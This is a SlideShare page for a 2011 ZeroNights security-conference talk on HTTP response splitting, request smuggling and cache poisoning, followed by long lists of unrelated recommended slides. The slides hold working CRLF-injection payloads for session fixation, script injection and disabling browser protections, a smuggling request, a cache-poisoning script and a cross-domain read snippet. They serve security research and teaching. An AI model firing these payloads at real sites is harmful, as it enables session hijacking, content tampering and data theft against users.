SlideShare une entreprise Scribd logo

Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back

DefconRussia
DefconRussia

International Security Conference "ZeroNights 2011" - http://www.zeronights.org/

Technologie
1  sur  19
Télécharger pour lire hors ligne
HTTP response Smuggling/Splitting & Cache poisoning Come back!
HTTP Response Splitting • Injection part of HTTP response to response from HTTP request. https://www.owasp.org/index.php/CRLF_Injection http://dl.packetstormsecurity.net/papers/general/whitepaper_ httpresponse.pdf http://www.derkeiler.com/Mailing- Lists/securityfocus/bugtraq/2002-05/0077.html
HTTP Response Splitting /redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0 d%0aHTTP/1.1 %20200%20OK%0d%0aContentType:%20text/html%0d%0aContentL ength:%2019%0d%0a%0d%0a<html>Shazam</html> This results in the following output stream, sent by the web server over the TCP connection: HTTP/1.1 302 Moved Temporarily Date: Wed, 24 Dec 2003 15:26:41 GMT Location: http://10.1.1.1/by_lang.jsp?lang=foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 <html>Shazam</html> * Example from http://dl.packetstormsecurity.net/papers/general/ whitepaper_httpresponse.pdf
PHP prevent splitting >=5.1.2, >=4.4.2 http://blog.php-security.org/archives/28-Goodbye-HTTP- Response-Splitting,-and-thanks-for-all-the-fish.html Goodbye HTTP Response Splitting, and thanks for all the fish //Thursday, January 12. 2006, Steffan Esser /* new line safety check */ char *s = header_line, *e = header_line + header_line_len, *p; while (s < e && (p = memchr(s, 'n', (e - s)))) { if (*(p + 1) == ' ' || *(p + 1) == 't') { s = p + 1;continue; } efree(header_line); sapi_module.sapi_error(E_WARNING, "Header may not contain more than a single header, new line detected."); return FAILURE; }
Why CRLF (%0d%0a) ??? http://www.w3.org/Protocols/rfc2616/rfc2616- sec6.html#sec6: After receiving and interpreting a request message, a server responds with an HTTP response message. Response = Status-Line ; Section 6.1 *(( general-header ; Section 4.5 | response-header ; Section 6.2 | entity-header ) CRLF) ; Section 7.1 CRLF [ message-body ] ; Section 7.2
And what about real browsers? #!/usr/bin/perl ... my $proto = getprotobyname('tcp'); my $servaddr = sockaddr_in(8080, INADDR_ANY); socket SERVER, PF_INET, SOCK_STREAM, $proto or die "Unable to create socket: $!"; bind SERVER, $servaddr or die "Unable to bind: $!"; listen SERVER, 10; my $answ = "HTTP/1.1 200 OK".chr(13)."Set-cookie: cook1=dsa" for(my $i=0; $i<255; $i++){ $answ.=chr($i)."Set-cookie: cook-$i=OK"; $answ .="rnrn<h1>Chrome 13</h1>"; } print "Server running on port $port...n"; while (accept CONNECTION, SERVER) { ...
And what about real browsers? • It is possible to bypass PHP header() function and do injection (except Firefox). • It is possible to split the Responce in Internet Explorer 8/9
Example #1. IE splitting (PHP all) <?php header("Location: ".$_GET['r']); ?> ?r=f%0dContent- Length:111%0d<html>%0d<script>alert(11)</script>
Smuggling classic http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf 01 POST http://SITE/foobar.html HTTP/1.1 02 Host: SITE 03 Connection: Keep-Alive 04 Content-Type: application/x-www-form-urlencoded 05 Content-Length: 0 06 Content-Length: 44 07 [CRLF] 08 GET /poison.html HTTP/1.1 09 Host: SITE 10 Bla: [space after the "Bla:", but no CRLF] 11 GET http://SITE/page_to_poison.html HTTP/1.1 12 Host: SITE 13 Connection: Keep-Alive 14 [CRLF]
Smuggling like header injections • Restrictions manipulations: foobar%0dAccess-Control-Allow-Origin: *; foobar%0dX-FRAME-OPTIONS: ALLOW-FROM attacker; foobar%0dX-XSS-Protection: 0; foobar%0dX-Content-Security-Policy: allow http://*:80; • Session fixation foobar:%0dSet- Cookie:PHPSESSID=FAKED%0dLocation=/auth.php • Scripting/HTML injection foobar:%0dRefresh: 1;url=data:text/html,<script>alert(1)</script>
Cache poisoning • Web server cache • Proxy server cache • Browser cache http://www.securityfocus.com/archive/ 1/434931 http://www.eecs.berkeley.edu/~yahel/ papers/Browser-Cache-Poisoning.Song.Spring10.attack- project.pdf http://www.eecs.berkeley.edu/~yahel/papers/Quantifying-Persistent- Browser-Cache-Poisoning.CS294-50.Song.Spring10.pdf
Cache poisoning classic http://dl.packetstormsecurity.net/papers/general/whitepaper _httpresponse.pdf (2004) Web servers, proxies and browser specified technics In exampe - IE 6 SP1 way: var r = new ActiveXObject("Microsoft.XMLHTTP"); r.open("GET","http://10.1.1.1/index.html",false); r.setRequestHeader("Pragma","no-cache"); r.send(); r.open("GET","http://10.1.1.1/SetLang.aspx?lang=%0d%0aContentLength:%200%0d %0a%0d%0aHTTP/1.1%20200%20 OK%0d%0aLastModified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT %0d%0aConte nt-Length:%2020%0d%0aContentType:%20text/html %0d%0a%0d%0a<html>Hacked!</html>",false); r.send(); r.open("GET","http://10.1.1.1/index.html",false); r.send();
Header injection & cache poising • foobar%0dCache-Control: fake • foobar%0dExpires: fake • foobar%0dLast-Modified: fake Which file is sweetest to poison? • /index.php ? • /auth.php ? • /private-data.php?
Which file is sweetest to poison? CROSSDOMAIN.XML http://www.adobe.com/devnet/ articles/crossdomain_policy_ file_spec.html http://learn.adobe.com/wiki/ download/attachments/ 64389123/CrossDomain_ PolicyFile_Specification.pdf ?version=1
Smuggling for non-HTTP PROTOCOLS?! M.Zalewski: The Tangled Web. http://www.nostarch.com/download/tangledweb_ch3.pdf GET /<html><body><h1>Hi! HTTP/1.1 Host: example.com:25 ... 220 example.com ESMTP 500 5.5.1 Invalid command: "GET /<html><body><h1>Hi! HTTP/1.1" 500 5.1.1 Invalid command: "Host: example.com:25" ... 421 4.4.1 Timeout
Smuggling for non-HTTP PROTOCOLS?! Port restrictions (Chrome) http://www.google.com/codesearch#wZuuyuB8jKQ/ chromium/src/net/base/net_util.cc&exact_package= chromiumos&q=IsPortAllowedByDefault&type=cs&l=1564 1,7,9,11,13,15,17,19-23,25,37,42,43,53,77,79,87,95,101- 104,109- 11,113,115,117,119,123,135,139,143,179,389,465,512- 515,526,530- 532,540,556,563,587,601,636,993,995,2049,3659,4045, 6000,6665-6669
Smuggling for non-HTTP PROTOCOLS?! Proxy server's response normalization Echo server example #1 (direct connection): > GET /<h1>O</h1> HTTP/1.1 < GET /<h1>O</h1> HTTP/1.1 ... connection never closed - timeout - no output Echo server example #2 (proxy connection): > GET /<h1>O</h1> HTTP/1.1 < GET /<h1>O</h1> HTTP/1.1 ... Proxy timeout, GET /<h1>O</h1> HTTP/1.1 output
Internet Explorer 8/9 bonus =) Domains in security zone with level "Low" and "Medium" access to any cross-domain data... <html> <script> function aa(url){ var client = new XMLHttpRequest(); client.open("GET", url,true); client.send(); client.onreadystatechange = function() { if(this.readyState == 2) alert(client.responseText); } } aa("http://mail.yandex.ru"); </script> </html>
??? d0znpp@onsec.ru

Recommandé

Ajax basics
Ajax basicsAjax basics
Ajax basicsHernán Garzón de la Roza
 
Angular js security
Angular js securityAngular js security
Angular js securityJose Manuel Ortega Candel
 
Codified PostgreSQL Schema
Codified PostgreSQL SchemaCodified PostgreSQL Schema
Codified PostgreSQL SchemaSean Chittenden
 
Learning Dtrace
Learning DtraceLearning Dtrace
Learning DtraceJeongHun Byeon
 
Puppet Camp 2012
Puppet Camp 2012Puppet Camp 2012
Puppet Camp 2012Server Density
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeAndrea Cardinale
 
Py conkr 20150829_docker-python
Py conkr 20150829_docker-pythonPy conkr 20150829_docker-python
Py conkr 20150829_docker-pythonEric Ahn
 
Http capturing
Http capturingHttp capturing
Http capturingEric Ahn
 

Recommandé

Ajax basics
Ajax basicsAjax basics
Ajax basicsHernán Garzón de la Roza
 
Angular js security
Angular js securityAngular js security
Angular js securityJose Manuel Ortega Candel
 
Codified PostgreSQL Schema
Codified PostgreSQL SchemaCodified PostgreSQL Schema
Codified PostgreSQL SchemaSean Chittenden
 
Learning Dtrace
Learning DtraceLearning Dtrace
Learning DtraceJeongHun Byeon
 
Puppet Camp 2012
Puppet Camp 2012Puppet Camp 2012
Puppet Camp 2012Server Density
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeAndrea Cardinale
 
Py conkr 20150829_docker-python
Py conkr 20150829_docker-pythonPy conkr 20150829_docker-python
Py conkr 20150829_docker-pythonEric Ahn
 
Http capturing
Http capturingHttp capturing
Http capturingEric Ahn
 
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Zend by Rogue Wave Software
 
Introduction to Flask Micro Framework
Introduction to Flask Micro FrameworkIntroduction to Flask Micro Framework
Introduction to Flask Micro FrameworkMohammad Reza Kamalifard
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentationSqa Enthusiast
 
Perl web app 테스트전략
Perl web app 테스트전략Perl web app 테스트전략
Perl web app 테스트전략Jeen Lee
 
Bootstrapping multidc observability stack
Bootstrapping multidc observability stackBootstrapping multidc observability stack
Bootstrapping multidc observability stackBram Vogelaar
 
Roll Your Own API Management Platform with nginx and Lua
Roll Your Own API Management Platform with nginx and LuaRoll Your Own API Management Platform with nginx and Lua
Roll Your Own API Management Platform with nginx and LuaJon Moore
 
Asynchronous PHP and Real-time Messaging
Asynchronous PHP and Real-time MessagingAsynchronous PHP and Real-time Messaging
Asynchronous PHP and Real-time MessagingSteve Rhoades
 
Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기JeongHun Byeon
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWim Godden
 
Static Typing in Vault
Static Typing in VaultStatic Typing in Vault
Static Typing in VaultGlynnForrest
 
Php version 7
Php version 7Php version 7
Php version 7RANVIJAY GAUR
 
Ruby HTTP clients comparison
Ruby HTTP clients comparisonRuby HTTP clients comparison
Ruby HTTP clients comparisonHiroshi Nakamura
 
Commencer avec le TDD
Commencer avec le TDDCommencer avec le TDD
Commencer avec le TDDEric Hogue
 
More than syntax
More than syntaxMore than syntax
More than syntaxWooga
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
 
Continuous testing In PHP
Continuous testing In PHPContinuous testing In PHP
Continuous testing In PHPEric Hogue
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Mohammad Reza Kamalifard
 
Guarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingGuarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingEric Hogue
 
Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Eric Hogue
 
How to deploy node to production
How to deploy node to productionHow to deploy node to production
How to deploy node to productionSean Hess
 
Rpi python web
Rpi python webRpi python web
Rpi python websewoo lee
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
 

Contenu connexe

Tendances

Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Zend by Rogue Wave Software
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentationSqa Enthusiast
 
Perl web app 테스트전략
Perl web app 테스트전략Perl web app 테스트전략
Perl web app 테스트전략Jeen Lee
 
Bootstrapping multidc observability stack
Bootstrapping multidc observability stackBootstrapping multidc observability stack
Bootstrapping multidc observability stackBram Vogelaar
 
Roll Your Own API Management Platform with nginx and Lua
Roll Your Own API Management Platform with nginx and LuaRoll Your Own API Management Platform with nginx and Lua
Roll Your Own API Management Platform with nginx and LuaJon Moore
 
Asynchronous PHP and Real-time Messaging
Asynchronous PHP and Real-time MessagingAsynchronous PHP and Real-time Messaging
Asynchronous PHP and Real-time MessagingSteve Rhoades
 
Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기JeongHun Byeon
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWim Godden
 
Static Typing in Vault
Static Typing in VaultStatic Typing in Vault
Static Typing in VaultGlynnForrest
 
Ruby HTTP clients comparison
Ruby HTTP clients comparisonRuby HTTP clients comparison
Ruby HTTP clients comparisonHiroshi Nakamura
 
Commencer avec le TDD
Commencer avec le TDDCommencer avec le TDD
Commencer avec le TDDEric Hogue
 
More than syntax
More than syntaxMore than syntax
More than syntaxWooga
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
 
Continuous testing In PHP
Continuous testing In PHPContinuous testing In PHP
Continuous testing In PHPEric Hogue
 
Guarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingGuarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingEric Hogue
 
Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Eric Hogue
 
How to deploy node to production
How to deploy node to productionHow to deploy node to production
How to deploy node to productionSean Hess
 

Tendances (20)

Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
 
Introduction to Flask Micro Framework
Introduction to Flask Micro FrameworkIntroduction to Flask Micro Framework
Introduction to Flask Micro Framework
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
 
Perl web app 테스트전략
Perl web app 테스트전략Perl web app 테스트전략
Perl web app 테스트전략
 
Bootstrapping multidc observability stack
Bootstrapping multidc observability stackBootstrapping multidc observability stack
Bootstrapping multidc observability stack
 
Roll Your Own API Management Platform with nginx and Lua
Roll Your Own API Management Platform with nginx and LuaRoll Your Own API Management Platform with nginx and Lua
Roll Your Own API Management Platform with nginx and Lua
 
Asynchronous PHP and Real-time Messaging
Asynchronous PHP and Real-time MessagingAsynchronous PHP and Real-time Messaging
Asynchronous PHP and Real-time Messaging
 
Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기Node.js API 서버 성능 개선기
Node.js API 서버 성능 개선기
 
When dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniquesWhen dynamic becomes static: the next step in web caching techniques
When dynamic becomes static: the next step in web caching techniques
 
Static Typing in Vault
Static Typing in VaultStatic Typing in Vault
Static Typing in Vault
 
Php version 7
Php version 7Php version 7
Php version 7
 
Ruby HTTP clients comparison
Ruby HTTP clients comparisonRuby HTTP clients comparison
Ruby HTTP clients comparison
 
Commencer avec le TDD
Commencer avec le TDDCommencer avec le TDD
Commencer avec le TDD
 
More than syntax
More than syntaxMore than syntax
More than syntax
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC Edition
 
Continuous testing In PHP
Continuous testing In PHPContinuous testing In PHP
Continuous testing In PHP
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
Guarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingGuarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous Testing
 
Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014Getting started with TDD - Confoo 2014
Getting started with TDD - Confoo 2014
 
How to deploy node to production
How to deploy node to productionHow to deploy node to production
How to deploy node to production
 

Similaire à Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back

Rpi python web
Rpi python webRpi python web
Rpi python websewoo lee
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & ToolsIan Barber
 
KSDG-iSlide App 開發心得分享
KSDG-iSlide App 開發心得分享KSDG-iSlide App 開發心得分享
KSDG-iSlide App 開發心得分享Chia Wei Tsai
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareAlona Mekhovova
 
Anatomy of a PHP Request ( UTOSC 2010 )
Anatomy of a PHP Request ( UTOSC 2010 )Anatomy of a PHP Request ( UTOSC 2010 )
Anatomy of a PHP Request ( UTOSC 2010 )Joseph Scott
 
Relayd: a load balancer for OpenBSD
Relayd: a load balancer for OpenBSD Relayd: a load balancer for OpenBSD
Relayd: a load balancer for OpenBSD Giovanni Bechis
 
Bare-knuckle web development
Bare-knuckle web developmentBare-knuckle web development
Bare-knuckle web developmentJohannes Brodwall
 
Introduction to Vert.x
Introduction to Vert.xIntroduction to Vert.x
Introduction to Vert.xYiguang Hu
 
Implementing Comet using PHP
Implementing Comet using PHPImplementing Comet using PHP
Implementing Comet using PHPKing Foo
 
REST with Eve and Python
REST with Eve and PythonREST with Eve and Python
REST with Eve and PythonPiXeL16
 
OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019Ayesh Karunaratne
 
Networking and Data Access with Eqela
Networking and Data Access with EqelaNetworking and Data Access with Eqela
Networking and Data Access with Eqelajobandesther
 
HTML5, The Open Web, and what it means for you - MDN Hack Day, Sao Paulo
HTML5, The Open Web, and what it means for you - MDN Hack Day, Sao PauloHTML5, The Open Web, and what it means for you - MDN Hack Day, Sao Paulo
HTML5, The Open Web, and what it means for you - MDN Hack Day, Sao PauloRobert Nyman
 
Websockets - DevFestX May 19, 2012
Websockets - DevFestX May 19, 2012Websockets - DevFestX May 19, 2012
Websockets - DevFestX May 19, 2012Sameer Segal
 
swift-nio のアーキテクチャーと RxHttpClient
swift-nio のアーキテクチャーと RxHttpClientswift-nio のアーキテクチャーと RxHttpClient
swift-nio のアーキテクチャーと RxHttpClientShinya Mochida
 
Real-Time Python Web: Gevent and Socket.io
Real-Time Python Web: Gevent and Socket.ioReal-Time Python Web: Gevent and Socket.io
Real-Time Python Web: Gevent and Socket.ioRick Copeland
 
Nodejs and WebSockets
Nodejs and WebSocketsNodejs and WebSockets
Nodejs and WebSocketsGonzalo Ayuso
 
Velocity EU 2014 — Offline-first web apps
Velocity EU 2014 — Offline-first web appsVelocity EU 2014 — Offline-first web apps
Velocity EU 2014 — Offline-first web appsandrewsmatt
 

Similaire à Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back (20)

Rpi python web
Rpi python webRpi python web
Rpi python web
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & Tools
 
KSDG-iSlide App 開發心得分享
KSDG-iSlide App 開發心得分享KSDG-iSlide App 開發心得分享
KSDG-iSlide App 開發心得分享
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middleware
 
Anatomy of a PHP Request ( UTOSC 2010 )
Anatomy of a PHP Request ( UTOSC 2010 )Anatomy of a PHP Request ( UTOSC 2010 )
Anatomy of a PHP Request ( UTOSC 2010 )
 
Relayd: a load balancer for OpenBSD
Relayd: a load balancer for OpenBSD Relayd: a load balancer for OpenBSD
Relayd: a load balancer for OpenBSD
 
Bare-knuckle web development
Bare-knuckle web developmentBare-knuckle web development
Bare-knuckle web development
 
Introduction to Vert.x
Introduction to Vert.xIntroduction to Vert.x
Introduction to Vert.x
 
Implementing Comet using PHP
Implementing Comet using PHPImplementing Comet using PHP
Implementing Comet using PHP
 
REST with Eve and Python
REST with Eve and PythonREST with Eve and Python
REST with Eve and Python
 
OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019OWASP Top 10 - DrupalCon Amsterdam 2019
OWASP Top 10 - DrupalCon Amsterdam 2019
 
Networking and Data Access with Eqela
Networking and Data Access with EqelaNetworking and Data Access with Eqela
Networking and Data Access with Eqela
 
HTML5, The Open Web, and what it means for you - MDN Hack Day, Sao Paulo
HTML5, The Open Web, and what it means for you - MDN Hack Day, Sao PauloHTML5, The Open Web, and what it means for you - MDN Hack Day, Sao Paulo
HTML5, The Open Web, and what it means for you - MDN Hack Day, Sao Paulo
 
Websockets - DevFestX May 19, 2012
Websockets - DevFestX May 19, 2012Websockets - DevFestX May 19, 2012
Websockets - DevFestX May 19, 2012
 
JS everywhere 2011
JS everywhere 2011JS everywhere 2011
JS everywhere 2011
 
swift-nio のアーキテクチャーと RxHttpClient
swift-nio のアーキテクチャーと RxHttpClientswift-nio のアーキテクチャーと RxHttpClient
swift-nio のアーキテクチャーと RxHttpClient
 
Real-Time Python Web: Gevent and Socket.io
Real-Time Python Web: Gevent and Socket.ioReal-Time Python Web: Gevent and Socket.io
Real-Time Python Web: Gevent and Socket.io
 
Nodejs and WebSockets
Nodejs and WebSocketsNodejs and WebSockets
Nodejs and WebSockets
 
Velocity EU 2014 — Offline-first web apps
Velocity EU 2014 — Offline-first web appsVelocity EU 2014 — Offline-first web apps
Velocity EU 2014 — Offline-first web apps
 

Plus de DefconRussia

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...DefconRussia
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...DefconRussia
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobindingDefconRussia
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/LinuxDefconRussia
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangDefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...DefconRussia
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринDefconRussia
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23DefconRussia
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20DefconRussia
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20DefconRussia
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20DefconRussia
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23DefconRussia
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23DefconRussia
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхDefconRussia
 

Plus de DefconRussia (20)

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golang
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей Тюрин
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
